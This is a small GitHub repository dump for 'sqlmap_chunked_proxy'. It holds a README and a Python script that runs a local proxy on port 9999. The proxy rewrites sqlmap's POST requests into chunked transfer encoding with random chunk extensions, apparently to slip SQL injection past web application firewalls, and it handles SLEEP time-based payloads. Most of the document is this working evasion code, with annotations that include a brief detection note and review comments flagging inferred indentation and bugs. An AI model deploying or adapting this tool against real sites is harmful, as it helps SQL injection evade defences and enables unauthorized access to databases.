├── README.md
├── Wireshark.jpeg
├── sqlmap.jpeg
├── sqlmap_chunked_proxy.jpeg
└── sqlmap_chunked_proxy.py

/README.md:
--------------------------------------------------------------------------------
## sqlmap_chunked_proxy
![](sqlmap_chunked_proxy.jpeg)
![](sqlmap.jpeg)
![](Wireshark.jpeg)
## Usage:
```bash
python3 sqlmap_chunked_proxy.py
sqlmap -u '' --data '' --proxy=http://127.0.0.1:9999
```
--------------------------------------------------------------------------------
/Wireshark.jpeg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/is101101/sqlmap_chunked_proxy/39c10447c0b7a6293678d07361dc002b54a444ad/Wireshark.jpeg
--------------------------------------------------------------------------------
/sqlmap.jpeg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/is101101/sqlmap_chunked_proxy/39c10447c0b7a6293678d07361dc002b54a444ad/sqlmap.jpeg
--------------------------------------------------------------------------------
/sqlmap_chunked_proxy.jpeg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/is101101/sqlmap_chunked_proxy/39c10447c0b7a6293678d07361dc002b54a444ad/sqlmap_chunked_proxy.jpeg
--------------------------------------------------------------------------------
/sqlmap_chunked_proxy.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# -*- coding: utf-8 -*-


"""
@author: 4rat
@time: 2019/3/11 23:33

Local HTTP proxy that rewrites every request it receives before forwarding it.

The Content-Length header line is replaced with 'Transfer-Encoding: Chunked'
and the last line of the request (treated as the POST body) is re-encoded as
a sequence of small chunks, each size line carrying a random chunk extension.
The rewritten request is handed to HackRequests and the response text is
written back to the client. The README points sqlmap at this proxy with
--proxy=http://127.0.0.1:9999.

Detection note: a body split this way only shows its original content once it
has been de-chunked, so request inspection has to run on the reassembled body;
the text after ';' on a chunk-size line is a chunk extension and carries no
payload data.
"""

from socket import *
import random
import string
import time
import HackRequests
import re

def Confuse():
    """Return a random string of 1 to 9 distinct ASCII letters and digits.

    random.sample draws without replacement, so no character repeats.
    payload2 uses the result as the chunk extension on each size line.
    """
    # The local name shadows the function name inside this scope only.
    Confuse = ''.join(random.sample(string.ascii_letters + string.digits,random.randint(1,9)))
    return Confuse

def payloadlistnum(s):
    """Pick a random number of pieces n for s such that len(s) / n < 9.

    With that bound payloadlist produces pieces of at most 9 characters, so
    the size payload2 writes for each piece is always a single digit.

    Raises:
        ValueError: if s is empty, because random.randint(1, 0) is an
            empty range.
    """
    while True:
        # Retry until the average piece length drops below 9.
        n = random.randint(1, len(s))
        num = len(s) / n
        if num < 9:
            return n

def payloadlist(s, n):
    """Split s into n consecutive slices and return them as a list.

    The first len(s) % n slices are one character longer than the rest, so
    the slice lengths differ by at most one and together cover all of s.
    """
    fn = len(s) // n    # base slice length
    rn = len(s) % n     # number of slices that get one extra character
    sr = []
    ix = 0              # start offset of the next slice
    for i in range(n):
        if i < rn:
            sr.append(s[ix:ix + fn + 1])
            ix += fn + 1
        else:
            sr.append(s[ix:ix + fn])
            ix += fn
    return (sr)

def payload2(s,n):
    """Encode s as a chunked body made of n pieces.

    Each non-empty piece becomes '<length>;<random extension>' on one line
    followed by the piece on the next; the body ends with a '0' line and an
    empty line. Lines are terminated with '\\n' only, and the length is
    written in decimal via str(len(...)).
    """
    payload2 =''
    for i in payloadlist(s, n):
        if len(i) == 0:
            # Empty slices are skipped; a zero size line would end the body.
            pass
        else:
            payload2 = payload2 + str(len(i))+';'+Confuse()+'\n'+str(i)+'\n'
    # Terminating zero-length chunk.
    payload2 = payload2 + '0' + '\n' + '\n'
    return (payload2)

def tamper(s):
    """Return s re-encoded as a chunked body with a randomly chosen piece count."""
    n = payloadlistnum(s)
    return (payload2(s,n))

def httphead(slist):
    """Return a copy of the request lines with Content-Length swapped out.

    Every line containing the exact substring 'Content-Length:' is replaced
    by 'Transfer-Encoding: Chunked\\r'; all other lines are copied as they
    are. The match is case-sensitive and is applied to every element of
    slist, not only to header lines.

    Side effect: the replacement is also written into slist[sj]. sj advances
    only on non-matching lines, so it equals the current index up to and
    including the first match; a second matching line would be written one
    position too early.
    """
    sj = 0
    httphead1 = []
    for i in slist:
        if 'Content-Length:' in i:
            xg = slist[sj] = 'Transfer-Encoding: Chunked\r'
            httphead1.append(xg)
        else:
            sj += 1
            httphead1.append(i)
    return httphead1

def httppostpayload(slist):
    """Return the last element of slist, which the caller uses as the POST body."""
    httppostpayload = slist[-1]
    return httppostpayload

# The listener is bound to the loopback address only.
HOST = '127.0.0.1'
PORT = 9999
ADDR = (HOST, PORT)
ProxyServer = socket(AF_INET, SOCK_STREAM)
ProxyServer.bind(ADDR)
ProxyServer.listen(5)
# NOTE(review): HackRequests is a third-party module not shown here; httpraw()
# presumably sends the raw request text and returns a response object - confirm.
hack = HackRequests.hackRequests()
print("\033[1;33m[*] Waiting for Client connection \033[0m")
# Connections are served one at a time. There is no exception handling in the
# loop, so any error raised while handling a request ends the process.
while True:
    tcpCliSock, addr = ProxyServer.accept()
    print("\033[1;33m[+] Connection Succeeded \033[0m")
    # Single read of at most 1024 bytes; anything beyond that is not read.
    s = tcpCliSock.recv(1024).decode('utf-8')
    if 'SLEEP' in s:
        # Take the text between the URL-encoded parentheses of SLEEP(...).
        # [0] raises IndexError when 'SLEEP' is present without that pattern,
        # and int() raises ValueError when the captured text is not an integer.
        payloadtime = re.findall(r'SLEEP%28(.*?)%29',s)[0]
        # The delay comes from the request itself and blocks the whole proxy
        # for that many seconds, here and again after the response arrives.
        time.sleep(int(payloadtime))
        slist = s.split('\n')
        headerslist = httphead(slist)
        s = httppostpayload(slist)
        httppost = tamper(s)
        # Replace the original body line with its chunked encoding.
        headerslist[-1] = httppost
        httpdata = ''
        for i in headerslist:
            # Lines were split on '\n', so each still ends in '\r'; turning
            # it into '\n' rejoins the request with bare line feeds.
            httpdata = httpdata + i.replace('\r', '\n')
        # NOTE(review): indentation inferred - the listing this was recovered
        # from had none. Placed after the loop, this appends the last element
        # (the chunked body) a second time; confirm against the original file.
        httpdata = httpdata + i.replace('\r', '\n')
        print("\033[1;33m[+] chunked Succeeded \033[0m")
        raw = httpdata
        aa = hack.httpraw(raw)
        time.sleep(int(payloadtime))
        # Only the value of aa.text() is written back to the client.
        payloaddata = aa.text()
        tcpCliSock.sendall(bytes(payloaddata, 'utf-8'))
        tcpCliSock.close()
        continue
    # Same steps as the branch above, without the two sleeps.
    slist = s.split('\n')
    headerslist = httphead(slist)
    s = httppostpayload(slist)
    httppost = tamper(s)
    headerslist[-1] = httppost
    httpdata = ''
    for i in headerslist:
        httpdata = httpdata + i.replace('\r','\n')
    # NOTE(review): placement inferred as in the branch above; confirm.
    httpdata = httpdata + i.replace('\r', '\n')
    print("\033[1;33m[+] chunked Succeeded \033[0m")
    raw = httpdata
    aa = hack.httpraw(raw)
    payloaddata = aa.text()
    # Self-assignment; has no effect.
    payloaddata = payloaddata
    tcpCliSock.sendall(bytes(payloaddata, 'utf-8'))
    tcpCliSock.close()
--------------------------------------------------------------------------------